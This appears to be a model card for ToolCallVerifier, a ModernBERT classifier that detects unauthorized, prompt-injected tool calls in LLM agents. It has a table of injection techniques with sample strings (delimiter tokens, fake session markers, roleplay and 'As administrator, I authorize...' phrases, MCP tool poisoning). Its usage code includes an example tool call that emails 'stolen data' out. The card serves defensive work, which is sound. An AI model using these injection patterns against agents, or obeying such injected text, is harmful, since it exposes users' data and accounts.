ToolCallVerifier - Unauthorized Tool Call Detection

Stage 2 of Two-Stage LLM Agent Defense Pipeline
🎯 What This Model Does
ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
| Label |
Description |
AUTHORIZED |
Token is part of a legitimate, user-requested action |
UNAUTHORIZED |
Token indicates injected/malicious content — BLOCK |
📊 Performance
| Metric |
Value |
| UNAUTHORIZED F1 |
93.50% |
| UNAUTHORIZED Precision |
95.01% |
| UNAUTHORIZED Recall |
92.05% |
| Overall Accuracy |
92.88% |
Confusion Matrix (Token-Level)
Predicted
AUTH UNAUTH
Actual AUTH 130,708 8,483
UNAUTH 13,924 161,031
🗂️ Training Data
Trained on ~30,000 samples combining real-world attacks and synthetic patterns:
HuggingFace Datasets
Synthetic Attack Generators
| Generator |
Description |
| Adversarial |
Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem |
File/directory operation attacks |
| Network |
Network/API exfiltration attacks |
| Email |
Email tool hijacking |
| Financial |
Transaction manipulation |
| Code Execution |
Code injection attacks |
| Authentication |
Access control bypass |
| MCP Attacks |
Tool poisoning, shadowing, rug pulls |
🚨 Attack Categories Covered
| Category |
Source |
Description |
| Delimiter Injection |
LLMail |
<<end_context>>, >>}}\]\]) |
| Word Obfuscation |
LLMail |
Inserting noise words between tokens |
| Fake Sessions |
LLMail |
START_USER_SESSION, EXECUTE_USERQUERY |
| Roleplay Injection |
WildJailbreak |
"You are an admin bot that can..." |
| XML Tag Injection |
WildJailbreak |
<execute_action>, <tool_call> |
| Authority Bypass |
WildJailbreak |
"As administrator, I authorize..." |
| Intent Mismatch |
Synthetic |
User asks X, tool does Y |
| MCP Tool Poisoning |
Synthetic |
Hidden exfiltration in tool args |
| MCP Shadowing |
Synthetic |
Fake authorization context |
💻 Usage
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch
model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
with torch.no_grad():
outputs = model(**inputs)
predictions = torch.argmax(outputs.logits, dim=-1)
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
print("⚠️ BLOCKED: Unauthorized tool call detected!")
print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
print("✅ Tool call authorized")
⚙️ Training Configuration
| Parameter |
Value |
| Base Model |
answerdotai/ModernBERT-base |
| Max Length |
512 tokens |
| Batch Size |
32 |
| Epochs |
5 |
| Learning Rate |
3e-5 |
| Loss |
CrossEntropyLoss (class-weighted) |
| Class Weights |
[0.5, 3.0] (AUTHORIZED, UNAUTHORIZED) |
| Attention |
SDPA (Flash Attention) |
| Hardware |
AMD Instinct MI300X (ROCm) |
🔗 Integration with FunctionCallSentinel
This model is Stage 2 of a two-stage defense pipeline:
┌─────────────────┐ ┌──────────────────────┐ ┌─────────────────┐
│ User Prompt │────▶│ FunctionCallSentinel │────▶│ LLM + Tools │
│ │ │ (Stage 1) │ │ │
└─────────────────┘ └──────────────────────┘ └────────┬────────┘
│
┌──────────────────────────────▼──────────────────────────┐
│ ToolCallVerifier (This Model) │
│ Token-level verification before tool execution │
└─────────────────────────────────────────────────────────┘
| Scenario |
Recommendation |
| General chatbot |
Stage 1 only |
| Tool-calling agent (low risk) |
Stage 1 only |
| Tool-calling agent (high risk) |
Both stages |
| Email/file system access |
Both stages |
| Financial transactions |
Both stages |
🎯 Intended Use
Primary Use Cases
- LLM Agent Security: Verify tool calls before execution
- Prompt Injection Defense: Detect unauthorized actions from injected prompts
- API Gateway Protection: Filter malicious tool calls at infrastructure level
Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English
⚠️ Limitations
- Tool schema dependent — Best performance when tool schema is included in input
- English only — Not tested on other languages
- Binary classification — No "suspicious" intermediate category (by design, for decisiveness)
📜 License
Apache 2.0
🔗 Links